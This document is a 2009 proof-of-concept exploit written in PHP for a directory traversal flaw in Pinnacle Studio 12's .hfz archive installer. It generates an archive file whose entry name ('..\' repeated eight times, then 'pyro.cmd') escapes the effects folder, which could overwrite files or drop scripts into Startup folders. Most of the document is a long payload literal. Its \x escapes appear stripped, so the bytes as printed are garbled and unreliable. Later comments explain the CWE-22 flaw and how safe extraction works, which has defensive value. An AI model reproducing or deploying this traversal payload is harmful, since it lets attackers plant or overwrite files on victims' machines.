# Title : Pinnacle Studio 12 (.hfz) Directory Traversal Vulnerability
# Published : 2009-05-13
# Author : Nine:Situations:Group
<?php
/*
Pinnacle Studio 12 "Hollywood FX Compressed Archive" (.hfz) directory
traversal vulnerability poc
by Nine:Situations:Group::pyrokinesis
Our site: http://retrogod.altervista.org/
Software site: http://www.pinnaclesys.com/
Some keys exported from the registry:
[HKEY_CLASSES_ROOT\.hfz]
@="hfzfile"
[HKEY_CLASSES_ROOT\.hfz\hfzfile]
[HKEY_CLASSES_ROOT\.hfz\hfzfile\ShellNew]
[HKEY_CLASSES_ROOT\hfzfile]
@="Hollywood FX Compressed Archive"
[HKEY_CLASSES_ROOT\hfzfile\DefaultIcon]
@="C:\WINDOWS\Installer\{D041EB9E-890A-4098-8F94-51DA194AC72A}\_A7BEE02B_CF3C_4710_85A0_92A3876E6F9C,0"
[HKEY_CLASSES_ROOT\hfzfile\shell]
[HKEY_CLASSES_ROOT\hfzfile\shell\Open]
[HKEY_CLASSES_ROOT\hfzfile\shell\Open\command]
@=""C:\Documents and Settings\All Users.WINDOWS\Documenti\Pinnacle\Content\HollywoodFX\InstallHFZ.exe" "%1""
"command"=hex(7):70,00,7e,00,46,00,78,00,6b,00,3f,00,49,00,63,00,69,00,38,00,
79,00,2b,00,37,00,32,00,6f,00,21,00,31,00,61,00,68,00,31,00,48,00,46,00,58,
00,3e,00,49,00,4d,00,53,00,27,00,73,00,50,00,7a,00,2e,00,6a,00,3d,00,34,00,
70,00,41,00,5b,00,4e,00,72,00,64,00,29,00,70,00,76,00,20,00,22,00,25,00,31,
00,22,00,00,00,00,00
Usually, files are decompressed into a Pinnacle effects folder...
The problem is that .hfz files can be used to overwrite files on the target system,
or to place scripts in Startup folders, via directory traversal,
and InstallHFZ.exe decompresses them with no prompts!
I just modified an existing .hfz file and here is the dump ...
Also I experienced some crashes in doing this... investigating...
*/
// Entry name used inside the generated archive: eight parent-directory
// segments followed by a file name. An extractor that joins such a name to
// its output directory without canonicalising it and rejecting anything that
// escapes that directory will write outside it (CWE-22); a safe extractor
// normalises the name and refuses it when it leaves the destination.
// The value is byte-identical to the published literal.
$____path = str_repeat('..\\', 8) . 'pyro.cmd';
// Archive image written verbatim to puf.hfz, with $____path concatenated in
// (presumably as the entry name; the extractor's format is not documented here).
// As printed, the runs of "xHH" pairs (e.g. "x48x46x58x5a" at the start and
// again near the end) look like "\xHH" escapes whose prefixes were lost during
// extraction, so this literal is plain ASCII text rather than the original
// bytes. NOTE(review): treat it as a record of the sample's layout, not as a
// working file image.
$____payload = "x48x46x58x5ax48x46x58x5ax9cx07x00x00x49x00x00x00". "x00x21x00x00x00x7e". $____path. "x65x07x00x00xa8x1cx00x00x8dxc2x71x5a". "x78x9cxbdx59x7bx4cx53x57x1cxbex05xf6x10x96x6cx0b". "x33xabx2fx5ax2dxe0xe4xddxd6x84xf2x18xbdx2dx6fx04". "x8axa5x50x44x50xcbx1bx05x8ax3cxb4x22x8ex25x26xcb". "xd4x64xeex8fx2dx9bxcbxe6xd4x2cx21xd3x65x6ex59xa2". "x5bx8cx01x97xa8x89xc1x05xf7xd7xd8x12xcdxc8x12x51". "xf7x62xe0x03x5fx77xdfxedx69x2fxb7xb7xb7xb7xe5xb2". "xecxe4x77x2exe7x9ex7bxcexefx7cxf7xfbx3dxcexb9xa5". "xa8xa0x26xbfx28x3fx4fx97x42x51x54x24xaaxd9x54x99". "x5cxd1xdexadx4exd3xe3x86x3axd4xd1x9ax13x45x7ax93". "x2ax4ax51xadx16xb6x5bx41x29x5cx54x71x59xa1x76xf0". "x15x8ax0ax53x84x47xa4xa1x33x16xd5xfbx37x70x79xd3". "xc8xafx76x3bx13x54xaaxabx9fx86x32xecx3fx97x50xd6". "x4dx4cx1cx0ax2ax09x09x6fx48x0fx08x65xa1xaaxaax27". "x16xcbx7dxc8x22xf1x00x4cx7axfax90x46xb3x3bx14xe4". "x44x44x17x6ax69x61x76xeex64x6cxb6xc7x10x09x3cx4c". "x5cx9cx3cx79x1ax1bxcbxbfx95xc6xd3xddxcdx6cxdexcc". "x6cxdcx38x07x7ex9cx4exc6x6ax7dx88x76x40x3cxa9xa9". "xf7x56xaex0cx02x20x21xe1xa1x5ax2dx31x60xe2xccx19". "xbexf8x2fx04x0cxe0x07xd7xcaxcax47x5bxb7x32xa5xa5". "xb3x25x25xffx04xe4x67xfdxfax07x31x31x8fxd7xacx09". "xb4x1cxc0xb0x78xd2xd3xefxafx5ax25x0fx0fx64x60x80". "xb5x17x50xa1x8dx6bx4dx0dx53x5bx1bx00x0fx4dx33x26". "x93xc0x04x44xe6x62x63x87x95x4axc8x1dx70xa8xd5x4a". "xf0x33x7bxedxdax0fxa7x4ex49xe0x81xdbx13x4ex60x3e". "xc2x18xb1x1axdfxc9xe7x75xc6xc7xcfxa9x54xb3xcbx97". "x0bx50x4dxb9xcbx65x9bx6bx9axb0x97x98xc8xacx5dx8b". "xc6xa3xd5xabxfdxf9xf9xf1xf4x69x09x3cx44x0ax0bxff". "x22x60x7ax7ax3cx44x01xe7x86x0dx33xe4x29x56xf7x01". "x60x36xb3x0bxe9xf5x5cxe7x6dx77x99xd8xbax7fx9axb3". "xa6xc1xc0x5ex4dx26x51x7bx4dx5dxbcx28x8dx07x02x4b". "x11x5ax9ax9bx59x3cxadxadxecx6dx47x87x78x7cxb1x48". "x52x53xe1xc0x84x01x82xe7x6axcdxc0xb4xc0xbbx32x32". "xf8x2fx12x8axffx08xa4xa8xe8x6fxe0x81xc9xcaxcbxef". "x21x1bx80xb1x80xf1x1ex1fxefx01x96x99x49xf0x7cx91". "xd7x26xc4xc3x49x72x32xaex93x23x23x0bxc5x43x04x90". 
"x20x68xecxd8xc1x72x25x11xc2x0fxd6xacx99xd1x68x08". "x9exc3x7ax3bxf0xf8x3bx3cxd7xf3xf3xd9xb3x80x71x65". "x78x78xa1x78x88xa5x90x04x48xdcx91xe0x12x8dxe2xdf". "xbax3ex44x58x11x3cxfbxd3x6cx1cx3fxa2x61x48x60x5c". "x3fx77x4ex06x1ex22x34x3dx55x5fxcfx20xa0xe0xc3xac". "xcexecx6cxc1x8bx03x46xd2xd2xd5x04xcfx50x8ax15x78". "x66x96x2dx93x88x77x79xf6xe2x0bxd2x91x27xc9xa8x54". "x82x64x48xf0x70x65xdfx6bx65x7fxa8x54x4fx34x1ax8c". "x14xc5x83x80xadxabx63x75xbax5cx9exd4x27x0fx12x5f". "xe7xddx15x2bx18xa3x91x6fx3bx0excfx50x42xb9xc7x5e". "x08xf3x82x02x7fx3cx44x1bx49x74x48xc2xc8x2dxd8xd0". "x17x89x87x64x39x6cx1cx10x01xa4xb7x12xcax89xdbx60". "x00x1axe4xeax8fx67xefx5exa6xa2xe2xc1xf6xedx32xc9". "x09x18xefx49x49xdcxeex79x43xadxbex2cxd8x6dxe3xe3". "x81x07xb6xf3xc7x63x77x6fx0ax70x4bxd1xb5xf2xf2x7e". "x97x89x87x64xe0x94x14xa9x7dxdfx68x84xcbx71xc0x82". "x2exb4x6bx17x0bx15x3bxbbx1cx3cx71x71xacx17x91xb8". "x93x90xacx2cxcexb2xd2xabx20xbdx60x77x40x86x41x1e". "x16x3dxf9x70x27xccx20x2bx86x2cx12x60xb0x5bxc1xc3". "xe1xeax84x1cx04x20x12x20x4ex65x12x53x2cx96x5bx34". "x7dx2ex3bxfbxebxf0xf0xe7x15x0axc5xf8xf8x38x17x59". "x4axa5xb2x25xc1x66x30x0cxe7xe5x9dxedxefx9fx95xed". "xa8x90xe2xe2x69x72x50x04x1bx88x3ex89x00x3cx5axff". "xd5x65xc7xe1x0fx8ax9dx1fx97xb8xb0xb4xc9x74xe1xd2". "xa5x4bx1cxa4x88xb0x70xbbxe9xddxa2xa2xefx2ax2bxef". "x6dxd9xc2x1exedxf8x0cx87xfexb5x82xd0xc3x60xd8x0e". "x48x36x6dx62x7bxbaxbax44x86x61x39x7cx36x69x34x9a". "xbaxbaxfax77x68x27xf0x64x64x7cx8ex1ex0ex0fxdaxb5". "xbax01x9axbex68xb3x3dx82x4ex37x9fxf7x17xf3xd1x84". "x97xb2xf3x92x15xd9x4fx39x99x98x98x20xebxe2xdcx65". "x50x26xefxd1x37x64x19x3ex8bx8ax8axe2xe3xc9x32x9c". "xacxa8xb8xd3xdexcex8ex87x1bx00x0cxf4x2cx06x12x72". "x14xdcx1bx2cx35x34x30x4dx4dx9exc3x06x61x9bx4fx85". "xcbxe5x22x5fx99xfcxcdxe2x99xb0x88x92x92x5fx0ax0a". "xfexc4x78xf8x21x08x07x4bx7dx7dx8cxc3xc1x48x7fxbc". "x04x75x72xacx0exdfx6ex6bx63x4dx09x23x92xd0x4bx4d". "x3dx74x3bx70x01xc2xdax9cx63x55x55x8fx89x12x4cx21". "xd2xd8xc8x12x0ex9dx38x4dxc9x66x69xdbx36x76x5bx81". 
"x12xe0x21xa9x60x70x90xedx17x10xc2x95xc9xc9x49xda". "xf0x49x75xb5x30x10xb8x2fx17x38x52x6fxafxd4xf7x54". "x50x41x74xecxdexedxc9x4bx50x88x36x10xe2xd8x1fx1d". "x9dx0ex2ax38x24x37x6fxdex8cx8cx8cxb4x5ax67x02xe9". "x01x12x58x1fxc1x8bxb7x83x06xecx5cx65x65x77x65x13". "x05xc1x7bxd9xddx99x13x0axe1x51xa4x93xa6xcfx47x46". "xc6x28x95x85x36x5bx90x0fx6dxbbx7bx0bx20xfex83x78". "x21x9cxcbx76x27xbbx3bx3bxe1x8axbdx0fx07x57x34x48". "x42x58x28xedxb0x54x67x27x1bx14x08x3dx72xe0x44xbc". "xc8x86x04x72x48x03x84x93x2cx07xcex83x6ex79xfex82". "xb4x06xaexc8xdbxe5xe6xdexe1x82xd7x5fx42x4cx11xe4". "x68x07x6fx87xc8xcex2ax5cxc0xf6xf7x33x24x53xc9x16". "xd0x02x25x7bxf6x2cx4ax89xc9x74x0bx2ex84x24x40x72". "xf8xe2x45xdex09x53x20x41x7fx71xfaxffx85x6fx71x4b". "x85x4dx67x45x7ax9bx0ax9fxffx75x91x2bx0ax4fx25x17". "xaexc1xfexf0x48xb3x8dx70xfex14x3cx8axe1xcdx3dx92". "x5fx5exadx9dx43x63xfcx39xafx66x93x8axb4xc2xa9x08". "xd1x5fx36x97x84xf4xabxe7xd5xb1xd2x1cxe1xbcx0bx63". "xa5xc6xd6x96xf8x11x8ax1ax1dxf1x7dx46x1bxbdxf5xea". "xd8x98xcfx3cx05x59x6fx54xafxffx06x73xe8x51xc1x82". "xc6xf9xeaxc3x49xe8xf3xbcx04x5cxe3x08x30x87x42x00". "x1dx4cxf1x47x47x96x89x01x0ax3ax0fxc4x19x7dx1fx2d". "xa1xd2x22xedx23x85xbfx66x4ax12x27x24x20x54x43x51". "x65xf9x79x5axd6xb7x8exbdx38xffx88xa2x5ex40x2dx72". "xf6xf6xa9xabxdbx9bx9ax9dx6axbdxf0x3ex82xe2x8fx16". "x96x97xd6xe2x72xc4xabxf9xb8x94x66xadxf0x7ex21x9a". "x4fx48x69xd6x09xefx43xd1x5cx69x2dxd0x9ex44xe3xed". "x68xfex58xf7x7fx0cx1cx8dx3bx9ax7ax9cxddx6ax3dx45". "x0dx19xe7xabxb8x36x91xa2xa0xc2x28x12x93x34xedx3f". "xcdx4bxbfx58xe1x59xabxc9x8bx14x25xccx7dx65x11x0f". "xe3xefx01x1fxc4xacx37x7bx08x15x81xcbxd5xf3x5dxd4". "x20xfaxccx22x60xa5xe1x1ex0fx09x2exfbx3fx95x68x4f". "x65xdbx2fxcfxc3x3dx18x00xaex4ex16xbbxc1xe0x9ex90". "x0bx37xd7x54xa6xebx45xb3xfbx55x3ex5cxf6x61x99xa3". "xbdx4bx9dxebxe8x6cxeex71xf8x68xa3x03x69xbfxd2x13". "x6bx46x7ax7bx9dxa2xb6x99xacxdfx1excdxf1x56xf6x99". "xe2xbdxf7xa3x15x0axdex34xd7xf5xf5x16x73x89xf6x53". "x34x69x15x7fxe9x67x29xe2x8ax6axfdx3axb4xf6x76xf7". 
"x38x9bxbax1dx7dx6dxfbx32x2dx0dxdbx9bx1bxfbx7ax33". "xd3xd2xd4xc9xeax5cx67x67xa7xb3x2bx93x0cx4cx69x6b". "x71x0ax40x8dx0ax38xa0x79x55xbcx28xdcx21x21xdcx3e". "x10x84x5ex98x26x3fx98x05x1dx8ex3exb5x36x04x98x64". "xa0x17x66x65xd6x8dx9cx75x75xc6x91xefxefxfexe4x93". "xedx96x7ex99x6exf4x56x0fx24x31x98x07xa4x61x9axc5". "x61xeax42x85xa9xe3xb1x19x34x99x4bxc0x3cx28x0exf3". "x5fx77x19xc2x8ex00x00x48x46x58x5ax28x00x00x00x44". "x00x00x00x00x11x00x00x00x7ex6fx72x67x73x3ax65x66". "x66x65x63x74x73x2ex6fx72x67x00x00x00x00x00x00x00". "x00x00x00x00x00x34x00x00";
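// Write the generated archive to puf.hfz in the working directory.
// fopen() returns false when the file cannot be created (unwritable
// directory, path in use); the original passed that straight to fputs(),
// which on PHP 8 fails with a TypeError instead of a readable message, so
// the handle is checked before use. 'wb' makes binary mode explicit (it is
// already PHP's default), since the content is meant to be raw bytes.
$_f = fopen('puf.hfz', 'wb');
if ($_f === false) {
    throw new RuntimeException('could not open puf.hfz for writing');
}
// fwrite() returns false on a failed write; a short write (int < length)
// is not distinguished here, matching the original's behaviour.
if (fwrite($_f, $____payload) === false) {
    fclose($_f);
    throw new RuntimeException('could not write puf.hfz');
}
fclose($_f);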
?>